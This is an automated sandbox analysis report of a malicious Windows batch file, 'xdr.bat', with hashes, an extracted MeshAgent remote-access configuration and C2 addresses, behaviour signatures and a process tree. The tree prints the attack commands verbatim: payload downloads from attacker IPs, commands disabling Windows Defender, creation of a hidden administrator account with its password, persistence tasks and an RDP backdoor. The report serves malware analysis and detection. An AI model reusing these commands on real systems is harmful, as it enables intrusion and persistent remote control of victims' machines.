Analysis

  • max time kernel
    127s
  • max time network
    131s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/10/2024, 17:40

General

  • Target

    xdr.bat

  • Size

    4KB

  • MD5

    9e779d369e3ca17fdc894d13c4fd797a

  • SHA1

    bf7e34e0da33a587177e66cfcec51f3aa75b4a87

  • SHA256

    15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

  • SHA512

    ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1

  • SSDEEP

    96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.yml

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/x222.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/WindowsUpdate.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/auto-install-hrdp.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/hrdp.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/update.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/autoupdate.zip

Extracted

Family

meshagent

Version

2

Botnet

hawlat

C2

http://45.139.196.71:443/agent.ashx

Attributes
  • mesh_id

    0x2C8478969E4CFA9513F19039B18062AD421F4DAF221C1152A30999ADFFCB13924EE4197808C0B50EB8A4890383CFE71E

  • server_id

    71C17FDD46B31764650F2D1D58C0308252130889EAD2CB51F652D3D44DDA6687355E5D788FD7CFD214D97F8E3D42DDAB

  • wss

    wss://45.139.196.71:443/agent.ashx

Signatures

  • Detects MeshAgent payload 3 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 9 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 10 IoCs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Modifies WinLogon 2 TTPs 5 IoCs
  • Drops file in System32 directory 64 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 27 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies data under HKEY_USERS 13 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5332
    • C:\Windows\system32\cmd.exe
      cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:6100
      • C:\Windows\system32\net.exe
        net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
        3⤵
          PID:4588
      • \??\UNC\45.139.196.250\shear\s.exe
        \\45.139.196.250\shear\s.exe -fullinstall
        2⤵
        • Sets service image path in registry
        • Drops file in Program Files directory
        PID:6124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'c:\'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1900
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
      • C:\Windows\system32\net.exe
        net user t1 Raed12346@@ /add
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5432
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user t1 Raed12346@@ /add
          3⤵
            PID:3136
        • C:\Windows\system32\net.exe
          net localgroup administrators t1 /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5264
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators t1 /add
            3⤵
              PID:4492
          • C:\Windows\system32\net.exe
            net localgroup Administratörer t1 /add
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4912
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administratörer t1 /add
              3⤵
                PID:2640
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
              2⤵
              • Hide Artifacts: Hidden Users
              PID:2376
            • C:\Windows\system32\net.exe
              net user t1 /active:no
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1740
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user t1 /active:no
                3⤵
                  PID:2244
              • C:\Windows\system32\net.exe
                net user t1 /active:yes
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2912
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user t1 /active:yes
                  3⤵
                    PID:4548
                • C:\Windows\system32\ReAgentc.exe
                  reagentc.exe /disable
                  2⤵
                  • Drops file in Windows directory
                  PID:4392
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
                  2⤵
                    PID:4648
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
                    2⤵
                      PID:4624
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
                      2⤵
                        PID:4656
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
                        2⤵
                          PID:1384
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
                          2⤵
                            PID:5536
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
                            2⤵
                              PID:4464
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                              2⤵
                              • Modifies Windows Defender Real-time Protection settings
                              PID:1588
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
                              2⤵
                                PID:5560
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:1256
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:4732
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:6020
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5716
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5768
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3268
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1444
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:6024
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4520
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:3028
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata\*.*
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:2864
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:2588
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3292
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:5332
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:5508
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:5892
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:4972
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:5612
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C C:\ProgramData\Windata\installer.bat
                                      2⤵
                                      • Drops file in Program Files directory
                                      PID:2828
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
                                        3⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2916
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4916
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C C:\ProgramData\Windata\hrdp\install.bat
                                        3⤵
                                          PID:2232
                                          • C:\ProgramData\Windata\hrdp\RDPWInst.exe
                                            "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
                                            4⤵
                                            • Server Software Component: Terminal Services DLL
                                            • Executes dropped EXE
                                            • Modifies WinLogon
                                            • Drops file in Program Files directory
                                            • System Location Discovery: System Language Discovery
                                            PID:1868
                                            • C:\Windows\SYSTEM32\netsh.exe
                                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                              5⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:560
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:704
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5720
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "update.zip" -DestinationPath "."
                                          3⤵
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5520
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
                                          3⤵
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4188
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
                                          3⤵
                                          • Drops file in Program Files directory
                                          PID:1072
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil dirty query C:
                                            4⤵
                                              PID:5868
                                            • C:\Windows\system32\findstr.exe
                                              findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                              4⤵
                                                PID:2928
                                              • C:\Windows\system32\findstr.exe
                                                findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                4⤵
                                                  PID:2976
                                                • C:\Windows\system32\findstr.exe
                                                  findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                  4⤵
                                                    PID:3012
                                                  • C:\Windows\system32\findstr.exe
                                                    findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                    4⤵
                                                      PID:2924
                                                    • C:\Windows\system32\findstr.exe
                                                      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                      4⤵
                                                        PID:1796
                                                      • C:\Windows\system32\findstr.exe
                                                        findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                        4⤵
                                                          PID:4272
                                                        • C:\Windows\system32\findstr.exe
                                                          findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                          4⤵
                                                            PID:5252
                                                          • C:\Windows\system32\findstr.exe
                                                            findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                            4⤵
                                                              PID:4908
                                                            • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                              "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4280
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
                                                            3⤵
                                                            • Drops file in Program Files directory
                                                            PID:5472
                                                            • C:\Windows\system32\fsutil.exe
                                                              fsutil dirty query C:
                                                              4⤵
                                                                PID:1224
                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                "C:\Program Files\RDP Wrapper\RDPWInst" -u
                                                                4⤵
                                                                • Server Software Component: Terminal Services DLL
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5036
                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                  netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:2100
                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
                                                                4⤵
                                                                • Server Software Component: Terminal Services DLL
                                                                • Executes dropped EXE
                                                                • Modifies WinLogon
                                                                • Drops file in Program Files directory
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2968
                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                  netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:3292
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil dirty query C:
                                                                4⤵
                                                                  PID:5852
                                                                • C:\Windows\system32\findstr.exe
                                                                  findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                  4⤵
                                                                    PID:5824
                                                                  • C:\Windows\system32\findstr.exe
                                                                    findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                    4⤵
                                                                      PID:3440
                                                                    • C:\Windows\system32\findstr.exe
                                                                      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                      4⤵
                                                                        PID:4720
                                                                      • C:\Windows\system32\findstr.exe
                                                                        findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                        4⤵
                                                                          PID:5892
                                                                        • C:\Windows\system32\findstr.exe
                                                                          findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                          4⤵
                                                                            PID:4892
                                                                          • C:\Windows\system32\findstr.exe
                                                                            findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                            4⤵
                                                                              PID:132
                                                                            • C:\Windows\system32\findstr.exe
                                                                              findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                              4⤵
                                                                                PID:1412
                                                                              • C:\Windows\system32\findstr.exe
                                                                                findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                4⤵
                                                                                  PID:1320
                                                                                • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                  "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6000
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
                                                                                3⤵
                                                                                  PID:5488
                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                    fsutil dirty query C:
                                                                                    4⤵
                                                                                      PID:4528
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
                                                                                      4⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3668
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:6004
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
                                                                                    3⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2980
                                                                                    • C:\Windows\system32\fsutil.exe
                                                                                      fsutil dirty query C:
                                                                                      4⤵
                                                                                        PID:3928
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc queryex "TermService"
                                                                                        4⤵
                                                                                        • Launches sc.exe
                                                                                        PID:1684
                                                                                      • C:\Windows\system32\find.exe
                                                                                        find "STATE"
                                                                                        4⤵
                                                                                          PID:2768
                                                                                        • C:\Windows\system32\find.exe
                                                                                          find /v "RUNNING"
                                                                                          4⤵
                                                                                            PID:1388
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c query session rdp-tcp
                                                                                            4⤵
                                                                                              PID:3464
                                                                                              • C:\Windows\system32\query.exe
                                                                                                query session rdp-tcp
                                                                                                5⤵
                                                                                                  PID:680
                                                                                                  • C:\Windows\system32\qwinsta.exe
                                                                                                    "C:\Windows\system32\qwinsta.exe" rdp-tcp
                                                                                                    6⤵
                                                                                                      PID:5056
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
                                                                                                  4⤵
                                                                                                  • Server Software Component: Terminal Services DLL
                                                                                                  PID:5740
                                                                                                • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                  "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                  4⤵
                                                                                                  • Server Software Component: Terminal Services DLL
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5692
                                                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                                                    netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                    5⤵
                                                                                                    • Modifies Windows Firewall
                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                    PID:5272
                                                                                                • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                  "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                                                                                                  4⤵
                                                                                                  • Server Software Component: Terminal Services DLL
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies WinLogon
                                                                                                  • Drops file in Program Files directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:776
                                                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                                                    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                    5⤵
                                                                                                    • Modifies Windows Firewall
                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                    PID:5720
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                  4⤵
                                                                                                    PID:3172
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                    4⤵
                                                                                                      PID:4056
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                                                                                                      4⤵
                                                                                                        PID:1292
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                        4⤵
                                                                                                          PID:972
                                                                                                          • C:\Windows\system32\cscript.exe
                                                                                                            cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                            5⤵
                                                                                                              PID:4780
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                                                                                                            4⤵
                                                                                                              PID:2268
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                                                                                                                5⤵
                                                                                                                  PID:1996
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.22000.469" /f
                                                                                                                4⤵
                                                                                                                  PID:5136
                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                  findstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                  4⤵
                                                                                                                    PID:2460
                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                    ping -n 1 google.com
                                                                                                                    4⤵
